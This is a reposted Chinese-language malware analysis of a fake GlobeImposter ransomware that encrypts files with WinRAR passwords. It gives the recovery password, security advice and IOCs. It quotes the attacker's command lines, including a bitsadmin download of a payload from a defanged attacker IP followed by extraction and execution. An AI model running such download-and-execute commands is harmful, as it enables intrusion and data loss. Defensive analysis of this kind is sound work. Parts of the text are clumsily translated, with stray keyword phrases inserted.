globeimposter 解密工具_WinRAR加密和压缩伪装成GlobeImposter勒索软件，易于安全专家解密...

最近，腾讯安全威胁情报中心发现假的GlobeImposter勒索软件病毒正在传播. 攻击者涉嫌通过MS SQL入侵服务器，通过网络下载恶意脚本代码，然后执行加密和勒索软件过程.

令人惊讶的是，这种所谓的“勒索软件”执行起来非常简单. 它仅使用WinRAR加密和压缩用户文件，然后修改GlobeImposter勒索软件电子邮件以威胁用户，然后与他们联系以通过电子邮件索取奖励. 腾讯安全提醒所有人，如果遇到此病毒，请不要急于支付赎金. 病毒加密和压缩的密码以纯文本形式写入病毒配置信息中. 使用此密码解压缩，文件即可完全恢复.

分析

涉嫌勒索的服务器被怀疑已通过MSSQL成功被黑客入侵，然后执行以下相关命令行以下载并执行恶意代码:

1)bitsadmin / transfer n hxxp: //47.92.55 [. ] 239 / s / jr26.rar C: /Progra~1/jr26.rar

2)C: \ Windows \ system32 \ cmd.exe / c C: \ Progra〜1 \ winrar \ rar.exe e -pp.5p C: \ Progra〜1 \ jr26.rar

3)C: \ Windows \ system32 \ cmd.exe / c C: \ Progra〜1 \ jr26.cmd

jr26.rar是一个带有密码的压缩包，密码为p.5p

将jr26.rar解压缩后，可以获得脚本文件，其中包含可疑的乱码.

检查十六进制系统，您可以发现似乎还有更多0xFF 0xFE 0x0D 0x0A. 外观检查应该是二进制形式的标志，这会使文本识别工具无法查看

删除0xFF 0xFE 0x0D 0x0A并尝试再次打开它，脚本内容就可以正常查看

检查脚本的内容，主要目的是根据后缀对指定类型的文件进行分类，并使用winrar对其进行加密和压缩(通过上图中的命令行参数winrar压缩包解密，我们看到了加密密码为lll.hc3t6b9s8kz5r26)，文件将被压缩. 转到根目录下相应的其他文件名(mailbox.ch_file后缀类型. 随机数tiger88818)，并同时删除原始文件.

如下图所示，在[emailprotected] _bax.32419tiger88818程序包中，所有bak类型文件都使用密码压缩

同时，为了防止在加密和压缩过程中占用文件，加密将停止，并且该病毒还将结束大量与服务有关的进程.

最奇怪的事情在这里. 加密文件完成后，病毒将远程下载赎金记录文档

打开说明文档，结果证明它是众所周知的勒索软件GlobeImposter的修改版本. 病毒作者仅修改了联系人电子邮件.

进一步观察病毒使用的URL，可以发现攻击者使用的多个文件，包括勒索记录(HOW_TO_BACK_YOUR_FILE *)，勒索脚本包(jr26.rar)，常规winrar压缩模块(Rar.exe)，猜测是与扫描仪相关的模块软件包(密码未知的s.rar软件包)，该病毒服务已部署在知名的云平台服务器上.

腾讯安全提醒所有人，对于这种病毒，您无需着急支付赎金. 您可以尝试使用Winrar在根目录中打开* tiger88818后缀文件，然后选择使用密码(lll.hc3t6b9s8kz5r26)将其解压缩到指定位置以恢复该文件.

安全建议

1. 尝试关闭不必要的端口，例如: 445、135、139等，端口3389、5900等的白名单配置，并且仅允许白名单中的IP连接登录；

2. 尽可能关闭不必要的文件共享. 如有必要，请使用ACL和强大的密码保护来限制访问权限，并禁用对共享文件夹的匿名访问；

3. 使用强密码，避免使用弱密码，并定期更改密码. 建议对服务器密码使用强密码和不规则密码winrar压缩包解密，并且必须对每个服务器要求不同的密码管理；

4. 为服务器/工作站的内部访问设置相应的控件，而无需互连要求，以防止外部网络服务器作为跳板受到攻击，从而进一步攻击其他服务器；

5. 对重要文件和数据(和其他数据)进行定期的非本地备份；

6. 教育终端用户在将附件下载到不熟悉的电子邮件时要格外小心，如果没有必要，则应禁止启用Office宏代码；

7. 在终端/服务器上部署的安全保护软件，并考虑在具有安全保护功能的腾讯云和其他云服务上部署Web服务器；

8. 建议在整个网络上安装玉电终端安全管理系统(). 御店终端安全管理系统具有全面的安全管理功能，如统一的终端防病毒管理，漏洞修复的统一管理和控制，以及战略管理和控制等，可以帮助企业管理者充分了解和管理企业内部网的安全状况，保护企业. 安全.

1. 启用腾讯计算机管理器，不要随意打开陌生的电子邮件，关闭Office来执行宏代码；

2. 打开计算机管理器的文档保护功能，然后使用冗余磁盘空间自动备份数据文件. 即使发生事故，也可以准备数据.

IOC

36e826b4a06dcbf039fb8fd6aeca4836

e9613db5620dbcb56903b98532971582

f18b3b2dc6556d60663d70a11c0ac8

URL:

hxxp: //47.92.55.239/s/HOW_TO_BACK_YOUR_FILES.txt

hxxp: //47.92.55.239/s/HOW_TO_BACK_YOUR_FILESxx.rar

hxxp: //47.92.55.239/s/jr26.rar

hxxp: //47.92.55.239/s/Rar.exe

hxxp: //47.92.55.239/s/s.rar

本文来自电脑杂谈，转载请注明本文网址：

http://www.pc-fly.com/a/ruanjian/article-284964-1.html